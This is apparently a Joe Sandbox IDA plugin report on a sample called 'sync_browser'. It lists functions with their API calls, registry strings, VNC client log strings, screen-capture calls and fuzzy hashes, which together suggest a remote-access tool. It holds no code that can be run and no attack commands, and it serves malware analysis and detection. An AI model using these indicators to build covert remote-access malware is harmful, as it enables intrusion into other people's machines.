Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID: System\CurrentControlSet\Control\Terminal Server$TSAppCompat
API String ID: 3677997916-252502655
Opcode ID: 04d61c28986da10210dbcfa3cf5e3dc0138d519c330a05b731dc0905639135b6
Instruction ID: 68cef6b64264af6cddb6442dea9069a60321ec67ba5b106b388cc08efedcff34
Opcode Fuzzy Hash: 04d61c28986da10210dbcfa3cf5e3dc0138d519c330a05b731dc0905639135b6
Instruction Fuzzy Hash: 26015E71A1CB86C6EB50AB61F44475AF764FB84798F800131EA9D06B78DF7CE158CB10

Function 00007FF740006D60 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32 ref: 00007FF740006D93
RegQueryValueExA.ADVAPI32 ref: 00007FF740006DD1
RegCloseKey.ADVAPI32 ref: 00007FF740006DF0

Strings

Installed, xrefs: 00007FF740006DBA
System\WPA\MediaCenter, xrefs: 00007FF740006D6E

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID: Installed$System\WPA\MediaCenter
API String ID: 3677997916-3461404619
Opcode ID: 554435a057f14dda37f7a57cb3d76111e403ad3072006c26abcf41054863a4ac
Instruction ID: 05bf56a139bf04dfdec3bfa5c918708b2938d5d03a3cd15374c783d0cbd324d7
Opcode Fuzzy Hash: 554435a057f14dda37f7a57cb3d76111e403ad3072006c26abcf41054863a4ac
Instruction Fuzzy Hash: 40016172A2CB82C2EB50AF21F44475AB764FB84794F800132EA8E06B68DF3CE144CB10

Function 00007FF74000A4C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32 ref: 00007FF74000A4E5
RegSetValueExA.ADVAPI32 ref: 00007FF74000A528
RegCloseKey.ADVAPI32 ref: 00007FF74000A533

Strings

WallpaperStyle, xrefs: 00007FF74000A521
Control Panel\Desktop, xrefs: 00007FF74000A4C9

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: CloseOpenValue
String ID: Control Panel\Desktop$WallpaperStyle
API String ID: 779948276-747434185
Opcode ID: 86799752d3e54857d2eafa99cacc6ace5413f974bbce5436984941c6bb35b0a9
Instruction ID: 63b852d8c033f3c74e2f080fca63b67dadf67d3f634d001c9d95d21f333fd3ba
Opcode Fuzzy Hash: 86799752d3e54857d2eafa99cacc6ace5413f974bbce5436984941c6bb35b0a9
Instruction Fuzzy Hash: F4012135A1CA52C2D710AB24F844559B3A0FB857E4F805321E96D43BE8DF2DE504CB14

Function 00007FF74000A440 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32 ref: 00007FF74000A465
RegQueryValueExA.ADVAPI32 ref: 00007FF74000A49F
RegCloseKey.ADVAPI32 ref: 00007FF74000A4AA

Strings

WallpaperStyle, xrefs: 00007FF74000A479
Control Panel\Desktop, xrefs: 00007FF74000A449

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Desktop$WallpaperStyle
API String ID: 3677997916-747434185
Opcode ID: 8f2748f2ab4e4755b02a530358349d128b83dd3c8b3fdf60e15f7253ce60a2a6
Instruction ID: 3d3970a2e13f07a103b7f3a982a3ca15f3c778228b0eacc8a135ead758f1642a
Opcode Fuzzy Hash: 8f2748f2ab4e4755b02a530358349d128b83dd3c8b3fdf60e15f7253ce60a2a6
Instruction Fuzzy Hash: 73F01935A0CA43C1EB10AB24F85465AA764FB85789FD00231DA8D03B78DF3DE159CB10

Function 00007FF7400B929C Relevance: 7.7, APIs: 5, Instructions: 187COMMON

Download Yara Rule

APIs

_getptd.LIBCMT ref: 00007FF7400B9274

Part of subcall function 00007FF7400C3848: _amsg_exit.LIBCMT ref: 00007FF7400C385E

_errno.LIBCMT ref: 00007FF7400C7168
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7400C7173

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: _amsg_exit_errno_getptd_invalid_parameter_noinfo
String ID:
API String ID: 1050512615-0
Opcode ID: 59d3a9a0c59e1ee59521e481f79702260e81d2ffae729b60c0b2a618ea284cda
Instruction ID: b131d858b9de1526ab05a25731d7bcb26e54d13aeb11c3ef6318f44e8dd0af6b
Opcode Fuzzy Hash: 59d3a9a0c59e1ee59521e481f79702260e81d2ffae729b60c0b2a618ea284cda
Instruction Fuzzy Hash: FF71C112A0C2D2D5F7697A75954097CABA4AB03B84F9C8431EE5D067AECF2CF851D321

Function 00007FF740030B70 Relevance: 7.6, APIs: 5, Instructions: 107windowCOMMON

Download Yara Rule

APIs

SelectObject.GDI32 ref: 00007FF740030BA4
BitBlt.GDI32 ref: 00007FF740030CC1
SelectObject.GDI32 ref: 00007FF740030CD3
GdiFlush.GDI32 ref: 00007FF740030CE2
GdiFlush.GDI32 ref: 00007FF740030D14

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: FlushObjectSelect
String ID:
API String ID: 2071645339-0
Opcode ID: aae6b1b2f4783f6f5e23d49270f9574a5a39ea57b095736f451dd763dd412b48
Instruction ID: 86ba8e12a5b039d607a1709c51e532ee24c6d6f91f3dc61ecb51028c9d702d78
Opcode Fuzzy Hash: aae6b1b2f4783f6f5e23d49270f9574a5a39ea57b095736f451dd763dd412b48
Instruction Fuzzy Hash: 41518E72A1D682CBE761BF25E0143A9BB90EB84B84F981136DA490776DCF3CF541CB21

Function 00007FF7400BCC70 Relevance: 7.6, APIs: 5, Instructions: 105COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 00007FF7400BCC96
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7400BCCA1
_getptd.LIBCMT ref: 00007FF7400BCCAD
_lock.LIBCMT ref: 00007FF7400BCCE6
_lock.LIBCMT ref: 00007FF7400BCD79

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: _lock$_errno_getptd_invalid_parameter_noinfo
String ID:
API String ID: 2808128820-0
Opcode ID: 293906f060d6459fee2b9c3bdc37a31292350123b62cfc1943e27c937da36d0d
Instruction ID: 9764aa73f6d6d95f02deef9cf60cc6c21014350b0ab8b0676d0cfc4ce1efbcf1
Opcode Fuzzy Hash: 293906f060d6459fee2b9c3bdc37a31292350123b62cfc1943e27c937da36d0d
Instruction Fuzzy Hash: C6418D25A1D642C1FB18BB62A940BBAA6A1BF45BC4FD40134DD5D0BBEADF6CF441C720

Function 00007FF7400C5D3C Relevance: 7.6, APIs: 5, Instructions: 102COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,?,?,?,00000010,00000008,?,00007FF7400C5EF7), ref: 00007FF7400C5D96
malloc.LIBCMT ref: 00007FF7400C5DFA
MultiByteToWideChar.KERNEL32(?,?,?,?,00000010,00000008,?,00007FF7400C5EF7), ref: 00007FF7400C5E42
GetStringTypeW.KERNEL32(?,?,?,?,00000010,00000008,?,00007FF7400C5EF7), ref: 00007FF7400C5E59
free.LIBCMT ref: 00007FF7400C5E6D

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$StringTypefreemalloc
String ID:
API String ID: 307345228-0
Opcode ID: 1b990316f8ee8c74eb84edbc338ace2982aad15001b0fddeae94aa45b172380f
Instruction ID: d07e5af3a22b3958bbbcb123fa780b8aeb6c9c2f9f4d168a55ec2aba7ed133cc
Opcode Fuzzy Hash: 1b990316f8ee8c74eb84edbc338ace2982aad15001b0fddeae94aa45b172380f
Instruction Fuzzy Hash: 48418372A1CB41C6EB28BF2598001A9B295FF44BA4F984231EE2D477E9DF38F4418320

Function 00007FF7400B7A88 Relevance: 7.6, APIs: 5, Instructions: 72COMMON

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,?,00000000,00007FF7400B7B9D,?,?,?,?,00007FF7400B79F3), ref: 00007FF7400B7AB1
DecodePointer.KERNEL32(?,?,00000000,00007FF7400B7B9D,?,?,?,?,00007FF7400B79F3), ref: 00007FF7400B7AC1

Part of subcall function 00007FF7400C3480: _errno.LIBCMT ref: 00007FF7400C3489
Part of subcall function 00007FF7400C3480: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7400C3494

EncodePointer.KERNEL32(?,?,00000000,00007FF7400B7B9D,?,?,?,?,00007FF7400B79F3), ref: 00007FF7400B7B3F

Part of subcall function 00007FF7400C3370: realloc.LIBCMT ref: 00007FF7400C339B
Part of subcall function 00007FF7400C3370: Sleep.KERNEL32(?,?,00000000,00007FF7400B7B2F,?,?,00000000,00007FF7400B7B9D,?,?,?,?,00007FF7400B79F3), ref: 00007FF7400C33B7

EncodePointer.KERNEL32(?,?,00000000,00007FF7400B7B9D,?,?,?,?,00007FF7400B79F3), ref: 00007FF7400B7B4F
EncodePointer.KERNEL32(?,?,00000000,00007FF7400B7B9D,?,?,?,?,00007FF7400B79F3), ref: 00007FF7400B7B5C

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: Pointer$Encode$Decode$Sleep_errno_invalid_parameter_noinforealloc
String ID:
API String ID: 1909145217-0
Opcode ID: 17a63d5b591e686c9ca2fe18f5a8febc498bada363ee497b58ea7ee50b63046d
Instruction ID: 4a69eeaa8710ac419c3b9584312ec7ce90603a556629d02227846ab343536387
Opcode Fuzzy Hash: 17a63d5b591e686c9ca2fe18f5a8febc498bada363ee497b58ea7ee50b63046d
Instruction Fuzzy Hash: C0217C21B1EA42C1EA15BB51F9546B9E261BF48BC0F844835DA0D077BDEF3CF4888720

Function 00007FF74002DAF0 Relevance: 7.6, APIs: 5, Instructions: 52COMMONLIBRARYCODE

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32 ref: 00007FF74002DB25
FreeLibrary.KERNEL32 ref: 00007FF74002DB3F
FreeLibrary.KERNEL32 ref: 00007FF74002DB58
DeleteCriticalSection.KERNEL32 ref: 00007FF74002DB7E
DeleteCriticalSection.KERNEL32 ref: 00007FF74002DB8C

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: CriticalDeleteSection$FreeLibrary
String ID:
API String ID: 3328731263-0
Opcode ID: 9dd024a0743743ff4cf6db73d8cdcba100ffa6c5f44379b46dcf004888688eea
Instruction ID: 148438303ca7bb08d8afd2eca0d6353d9df2b12df417d91125f4a2f5e1c4d81d
Opcode Fuzzy Hash: 9dd024a0743743ff4cf6db73d8cdcba100ffa6c5f44379b46dcf004888688eea
Instruction Fuzzy Hash: FD212B2171DA81E6EA49FB20E5A02F9B360FF85750F840131C6AD037B9DF28F5A4C321

Function 00007FF740029390 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 50COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF7400293C0

Part of subcall function 00007FF74006CC40: shutdown.WS2_32 ref: 00007FF74006CC70
Part of subcall function 00007FF74006CC40: closesocket.WS2_32 ref: 00007FF74006CC7A

Strings

vncclient.cpp : enable update thread, xrefs: 00007FF74002940B
vncclient.cpp : protocol enabled too many times!, xrefs: 00007FF7400293D1
c, xrefs: 00007FF7400293B5
vncclient.cpp : enable/disable synced, xrefs: 00007FF740029448

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: CriticalEnterSectionclosesocketshutdown
String ID: c$vncclient.cpp : enable update thread$vncclient.cpp : enable/disable synced$vncclient.cpp : protocol enabled too many times!
API String ID: 3339156387-1190838069
Opcode ID: ef05844faa1cd020fc3eb9c414a04fab55e6cb55e3cee0b01a28a687e8f68859
Instruction ID: cb2d28f5e9b0161c6b7b6a8e0ce7c367dc4f480d720ea8c03322263edc89aa4c
Opcode Fuzzy Hash: ef05844faa1cd020fc3eb9c414a04fab55e6cb55e3cee0b01a28a687e8f68859
Instruction Fuzzy Hash: FE214961A1CA82C1E750BF24E8406E9A365FB88BA4F840231DA1D8B3A9DF3CF5058720

Function 00007FF7400CA62C Relevance: 7.5, APIs: 5, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF7400CA663
GetCurrentProcessId.KERNEL32 ref: 00007FF7400CA66E
GetCurrentThreadId.KERNEL32 ref: 00007FF7400CA67A
GetTickCount.KERNEL32 ref: 00007FF7400CA686
QueryPerformanceCounter.KERNEL32 ref: 00007FF7400CA697

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: 5fd10cac5a6f9bb249cac31feee61d70b85b460cd106259e4606b4f7c020a879
Instruction ID: 39cecea207b22ad035fee2e8522567e3a8b7a2365b9672195456fb3cfcd2b9de
Opcode Fuzzy Hash: 5fd10cac5a6f9bb249cac31feee61d70b85b460cd106259e4606b4f7c020a879
Instruction Fuzzy Hash: E1019B25A6DA01C2E740BF21F444265B360FF45B94F946530EE9E477B4CF3CE9858720

Function 00007FF740017A30 Relevance: 7.5, APIs: 5, Instructions: 32COMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,?,?,00007FF7400176B4), ref: 00007FF740017A4B
SetEvent.KERNEL32(?,?,?,00007FF7400176B4), ref: 00007FF740017A55
SetEvent.KERNEL32(?,?,?,00007FF7400176B4), ref: 00007FF740017A5F
InitializeCriticalSection.KERNEL32(?,?,?,00007FF7400176B4), ref: 00007FF740017A8B
InitializeCriticalSection.KERNEL32(?,?,?,00007FF7400176B4), ref: 00007FF740017A95

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

